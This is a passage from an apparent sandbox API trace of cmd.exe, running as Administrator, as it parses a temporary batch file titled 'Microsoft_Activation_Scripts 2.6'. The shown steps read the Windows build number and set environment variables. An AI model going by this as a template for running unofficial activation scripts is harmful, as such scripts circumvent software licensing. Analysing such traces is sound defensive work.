(_String1="ps", _String2="/P", _MaxCount=0x2) returned 65 [0175.834] SetEnvironmentVariableW (lpName="psc", lpValue="powershell.exe") returned 1 [0175.835] GetProcessHeap () returned 0x19a8f1e0000 [0175.835] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef710) returned 1 [0175.835] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.835] GetProcessHeap () returned 0x19a8f1e0000 [0175.835] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbd8) returned 0x19a8f1eeb50 [0175.835] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xbd8 | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.835] FreeEnvironmentStringsA (penv="=") returned 1 [0175.835] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.836] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.836] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.836] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.836] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.836] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.837] SetConsoleInputExeNameW () returned 0x1 [0175.837] GetConsoleOutputCP () returned 0x1b5 [0175.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.838] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.838] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.838] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.838] SetFilePointer (in: hFile=0x90, lDistanceToMove=3492, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xda4 [0175.838] GetProcessHeap () returned 0x19a8f1e0000 [0175.839] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9590) returned 1 [0175.839] GetProcessHeap () returned 0x19a8f1e0000 [0175.839] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.839] GetProcessHeap () returned 0x19a8f1e0000 [0175.840] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0930) returned 1 [0175.840] GetProcessHeap () returned 0x19a8f1e0000 [0175.840] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0175.840] GetProcessHeap () returned 0x19a8f1e0000 [0175.842] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0175.842] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.842] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xda4 [0175.842] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.842] SetFilePointer (in: hFile=0x90, lDistanceToMove=3558, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xde6 [0175.842] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n", cbMultiByte=66, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n========================================================================\r\n") returned 66 [0175.842] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.842] GetFileType (hFile=0x90) returned 0x1 [0175.842] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.843] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xde6 [0175.843] GetProcessHeap () returned 0x19a8f1e0000 [0175.843] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdda0 [0175.843] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdda0) returned 1 [0175.844] _wcsicmp (_String1="for", _String2=")") returned 61 [0175.844] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0175.844] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0175.844] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.844] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8700 [0175.844] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0175.844] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x1a) returned 0x19a8f1eb800 [0175.844] GetProcessHeap () returned 0x19a8f1e0000 [0175.844] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1a [0175.844] _wcsicmp (_String1="/L", _String2="/f") returned 6 [0175.848] _wcsicmp (_String1="/D", _String2="/f") returned -2 [0175.848] _wcsicmp (_String1="/F", _String2="/f") returned 0 [0175.848] GetProcessHeap () returned 0x19a8f1e0000 [0175.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f9400 [0175.848] _wcsicmp (_String1="/L", _String2="%G") returned 10 [0175.848] _wcsicmp (_String1="/D", _String2="%G") returned 10 [0175.848] _wcsicmp (_String1="/F", _String2="%G") returned 10 [0175.848] _wcsicmp (_String1="/R", _String2="%G") returned 10 [0175.848] _wcsicmp (_String1="IN", _String2="in") returned 0 [0175.848] GetProcessHeap () returned 0x19a8f1e0000 [0175.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0175.848] _wcsicmp (_String1="DO", _String2="do") returned 0 [0175.848] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.848] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.848] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.848] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.849] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.849] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.849] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc80 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0e30 [0175.849] _tell (_FileHandle=3) returned 3558 [0175.849] _close (_FileHandle=3) returned 0 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f86a0 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec7e0 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca20 [0175.849] GetProcessHeap () returned 0x19a8f1e0000 [0175.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec800 [0175.849] _wcsnicmp (_String1="tokens=6", _String2="usebackq", _MaxCount=0x8) returned -1 [0175.849] _wcsnicmp (_String1="tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0175.849] _wcsnicmp (_String1="toke", _String2="eol=", _MaxCount=0x4) returned 15 [0175.849] _wcsnicmp (_String1="tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0175.849] _wcsnicmp (_String1="token", _String2="skip=", _MaxCount=0x5) returned 1 [0175.849] _wcsnicmp (_String1="tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0175.849] wcstol (in: _String="6 delims=[]. \"", _EndPtr=0x43f9efed20, _Radix=0 | out: _EndPtr=0x43f9efed20*=" delims=[]. \"") returned 6 [0175.849] _wcsnicmp (_String1="delims=[", _String2="usebackq", _MaxCount=0x8) returned -17 [0175.850] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0175.850] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0175.850] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0175.850] GetProcessHeap () returned 0x19a8f1e0000 [0175.850] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0175.850] GetProcessHeap () returned 0x19a8f1e0000 [0175.850] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb9e0 [0175.850] _wpopen (_Command="ver", _Mode="rb") returned 0x7ffbed90e2a0 [0175.861] feof (_File=0x7ffbed90e2a0) returned 0 [0175.861] ferror (_File=0x7ffbed90e2a0) returned 0 [0175.861] GetProcessHeap () returned 0x19a8f1e0000 [0175.861] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x110) returned 0x19a8f1eabb0 [0175.861] fgets (in: _Buf=0x19a8f1eabc0, _MaxCount=256, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0175.927] feof (_File=0x7ffbed90e2a0) returned 0 [0175.927] ferror (_File=0x7ffbed90e2a0) returned 0 [0175.927] GetProcessHeap () returned 0x19a8f1e0000 [0175.928] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0x210) returned 0x19a8f1f9f80 [0175.928] GetProcessHeap () returned 0x19a8f1e0000 [0175.928] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0x210 [0175.928] fgets (in: _Buf=0x19a8f1f9f92, _MaxCount=510, _File=0x7ffbed90e2a0 | out: _Buf="Microsoft Windows [Version 10.0.10586]\r\n", _File=0x7ffbed90e2a0) returned="Microsoft Windows [Version 10.0.10586]\r\n" [0175.931] feof (_File=0x7ffbed90e2a0) returned 0 [0175.931] ferror (_File=0x7ffbed90e2a0) returned 0 [0175.931] GetProcessHeap () returned 0x19a8f1e0000 [0175.931] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0x310) returned 0x19a8f1ea4b0 [0175.931] GetProcessHeap () returned 0x19a8f1e0000 [0175.931] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x310 [0175.931] fgets (in: _Buf=0x19a8f1ea4ea, _MaxCount=726, _File=0x7ffbed90e2a0 | out: _Buf="", _File=0x7ffbed90e2a0) returned 0x0 [0175.985] _pclose (in: _File=0x7ffbed90e2a0 | out: _File=0x7ffbed90e2a0) returned 0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea4b0, Size=0x68) returned 0x19a8f1ea4b0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x68 [0175.995] memcpy (in: _Dst=0x19a8f1ea4ea, _Src=0x19a8f1ea4c0, _Size=0x2a | out: _Dst=0x19a8f1ea4ea) returned 0x19a8f1ea4ea [0175.995] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\nMicrosoft Windows [Version 10.0.10586]\r\n", cbMultiByte=42, lpWideCharStr=0x19a8f1ea4c0, cchWideChar=42 | out: lpWideCharStr="\r\nMicrosoft Windows [Version 10.0.10586]\r\n") returned 42 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdda0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fdda0, Size=0x30) returned 0x19a8f1fdda0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fdda0) returned 0x30 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdde0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fdde0, Size=0x90) returned 0x19a8f1fdde0 [0175.995] GetProcessHeap () returned 0x19a8f1e0000 [0175.995] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fdde0) returned 0x90 [0175.995] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efea00, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.996] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.996] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.996] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.996] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.996] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.996] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.996] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.996] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.996] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.996] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.996] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.996] GetProcessHeap () returned 0x19a8f1e0000 [0175.996] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x50) returned 0x19a8f1f8ac0 [0175.996] GetProcessHeap () returned 0x19a8f1e0000 [0175.996] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8ac0, Size=0x30) returned 0x19a8f1e0f30 [0175.996] GetProcessHeap () returned 0x19a8f1e0000 [0175.996] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0f30) returned 0x30 [0175.996] wcsncmp (_String1="winb", _String2="/", _MaxCount=0x4) returned 72 [0175.996] GetProcessHeap () returned 0x19a8f1e0000 [0175.996] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0f70 [0175.996] _wcsnicmp (_String1="wi", _String2="/A", _MaxCount=0x2) returned 72 [0175.996] _wcsnicmp (_String1="wi", _String2="/P", _MaxCount=0x2) returned 72 [0175.996] SetEnvironmentVariableW (lpName="winbuild", lpValue="10586") returned 1 [0175.996] GetProcessHeap () returned 0x19a8f1e0000 [0175.997] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.997] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.997] GetProcessHeap () returned 0x19a8f1e0000 [0175.997] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbe0) returned 0x19a8f1ef740 [0175.997] memcpy (in: _Dst=0x19a8f1ef740, _Src=0x19a8f1eeb50, _Size=0xbe0 | out: _Dst=0x19a8f1ef740) returned 0x19a8f1ef740 [0175.997] FreeEnvironmentStringsA (penv="=") returned 1 [0175.997] GetProcessHeap () returned 0x19a8f1e0000 [0175.998] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0175.998] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.998] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.998] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.998] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.998] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.998] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.999] SetConsoleInputExeNameW () returned 0x1 [0175.999] GetConsoleOutputCP () returned 0x1b5 [0175.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.999] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0175.999] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0175.999] _get_osfhandle (_FileHandle=3) returned 0x84 [0175.999] SetFilePointer (in: hFile=0x84, lDistanceToMove=3558, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xde6 [0175.999] GetProcessHeap () returned 0x19a8f1e0000 [0176.000] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0176.000] GetProcessHeap () returned 0x19a8f1e0000 [0176.000] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0176.001] GetProcessHeap () returned 0x19a8f1e0000 [0176.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdde0) returned 1 [0176.001] GetProcessHeap () returned 0x19a8f1e0000 [0176.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdda0) returned 1 [0176.001] GetProcessHeap () returned 0x19a8f1e0000 [0176.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0176.002] GetProcessHeap () returned 0x19a8f1e0000 [0176.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca20) returned 1 [0176.002] GetProcessHeap () returned 0x19a8f1e0000 [0176.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7e0) returned 1 [0176.002] GetProcessHeap () returned 0x19a8f1e0000 [0176.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0176.002] GetProcessHeap () returned 0x19a8f1e0000 [0176.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e30) returned 1 [0176.003] GetProcessHeap () returned 0x19a8f1e0000 [0176.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0176.003] GetProcessHeap () returned 0x19a8f1e0000 [0176.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0176.004] GetProcessHeap () returned 0x19a8f1e0000 [0176.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0176.004] GetProcessHeap () returned 0x19a8f1e0000 [0176.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9400) returned 1 [0176.004] GetProcessHeap () returned 0x19a8f1e0000 [0176.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0176.004] GetProcessHeap () returned 0x19a8f1e0000 [0176.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8700) returned 1 [0176.004] GetProcessHeap () returned 0x19a8f1e0000 [0176.005] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0176.005] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.005] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xde6 [0176.005] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.005] SetFilePointer (in: hFile=0x84, lDistanceToMove=3560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xde8 [0176.005] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nr /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n========================================================================\r\n") returned 2 [0176.005] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.005] GetFileType (hFile=0x84) returned 0x1 [0176.005] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.005] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xde8 [0176.005] GetProcessHeap () returned 0x19a8f1e0000 [0176.005] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0176.005] GetProcessHeap () returned 0x19a8f1e0000 [0176.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0176.006] _tell (_FileHandle=3) returned 3560 [0176.006] _close (_FileHandle=3) returned 0 [0176.006] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0176.006] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0176.006] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.006] SetFilePointer (in: hFile=0x84, lDistanceToMove=3560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xde8 [0176.007] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.007] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xde8 [0176.007] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.007] SetFilePointer (in: hFile=0x84, lDistanceToMove=3572, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdf4 [0176.007] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _NCS=1\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _NCS=1\r\nns=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n========================================================================\r\n") returned 12 [0176.007] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.007] GetFileType (hFile=0x84) returned 0x1 [0176.007] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.007] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdf4 [0176.007] GetProcessHeap () returned 0x19a8f1e0000 [0176.007] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0176.007] GetProcessHeap () returned 0x19a8f1e0000 [0176.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0176.008] _wcsicmp (_String1="set", _String2=")") returned 74 [0176.008] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.008] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.008] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.008] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.008] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.008] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.008] GetProcessHeap () returned 0x19a8f1e0000 [0176.008] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0176.008] GetProcessHeap () returned 0x19a8f1e0000 [0176.008] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd00 [0176.008] GetProcessHeap () returned 0x19a8f1e0000 [0176.008] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0176.008] _tell (_FileHandle=3) returned 3572 [0176.008] _close (_FileHandle=3) returned 0 [0176.008] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0176.008] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0176.008] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0176.008] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0176.008] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0176.008] _wcsicmp (_String1="set", _String2="CD") returned 16 [0176.008] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0176.009] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0176.009] _wcsicmp (_String1="set", _String2="REN") returned 1 [0176.009] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0176.009] _wcsicmp (_String1="set", _String2="SET") returned 0 [0176.009] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.009] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0176.009] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0176.009] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0176.009] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0176.009] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0176.009] _wcsicmp (_String1="set", _String2="CD") returned 16 [0176.009] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0176.009] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0176.009] _wcsicmp (_String1="set", _String2="REN") returned 1 [0176.009] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0176.009] _wcsicmp (_String1="set", _String2="SET") returned 0 [0176.009] GetProcessHeap () returned 0x19a8f1e0000 [0176.009] RtlAllocateHeap 